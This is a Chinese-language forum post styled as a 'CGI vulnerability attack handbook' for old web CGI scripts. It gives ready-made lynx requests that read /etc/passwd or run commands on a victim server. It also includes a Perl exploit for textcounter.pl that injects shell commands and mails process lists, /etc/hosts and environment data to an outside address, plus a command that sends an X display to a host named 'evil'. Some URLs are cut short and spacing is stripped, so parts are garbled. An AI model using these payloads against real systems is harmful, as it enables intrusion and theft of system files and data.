前言在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加...更欢迎任意散播.一.phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:lynxhttp://www.victim.com/cgi-bin/phf?Q...t%20/etc/passwd但是我们还能找到它吗?二.php.cgi2.0beta10或更早版本的漏洞可以读nobody权限的所有文件.lynxhttp://www.victim.com/cgi-bin/php.cgi?/etc/passwdphp.cgi2.1版本的只能读shtml文件了.对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd/etc/security/passwd等.三.whois_raw.cgilynxhttp://www.victim.com/cgi-bin/whois...t%20/etc/passwdlynxhttp://www.victim.com/cgi-bin/whois...ella.lame.org:0四.faxsurveylynxhttp://www.victim.com/cgi-bin/faxsu...t%20/etc/passwd五.textcounter.pl如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.#!/usr/bin/perl$URL='http://dtp.kappa.ro/a/test.shtml';#please_DO__modify_this$EMAIL='pdoru@pop3.kappa.ro,root';#please_DO__modify_thisif($ARGV[0]){$CMD=$ARGV[0];}else{$CMD="(psax;cd..;cd..;cd..;cdetc;cathosts;set)\|mail${EMAIL}-sanothere_one";}$text="${URL}/;IFS=\8;${CMD};echo|";$text=~s//\$\{IFS\}/g;#print"$text\n";system({"wget"}"wget",$text,"-O/dev/null");system({"wget"}"wget",$text,"-O/dev/null");#system({"lynx"}"lynx",$text);#如果没有wget命令也可以用lynx#system({"lynx"}"lynx",$text);六.一些版本(1.1)的info2www的漏洞$REQUEST_METHOD=GET./info2www'(../../../../../../../bin/mailjami</etc/passwd|)'$Youhavenewmail.$说实在我不太明白.七.pfdispaly.cgilynx-source\'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'pfdisplay.cgi还有另外一个漏洞可以执行命令lynx-dumphttp://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'orlynx-dump\http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'八.wraplynxhttp://www.victim.com/cgi-bin/wrap?/../../../../../etc九.www-sql可以让你读一些受限制的页面如:在你的浏览器里输入:http://your.server/protected/something.html:被要求输入帐号和口令.而有www-sql就不必了:http://your.server/cgi-bin/www-sql/...something.html:十.view-sourcelynxhttp://www.victim.com/cgi-bin/view-..../../etc/passwd十一.campaslynxhttp://www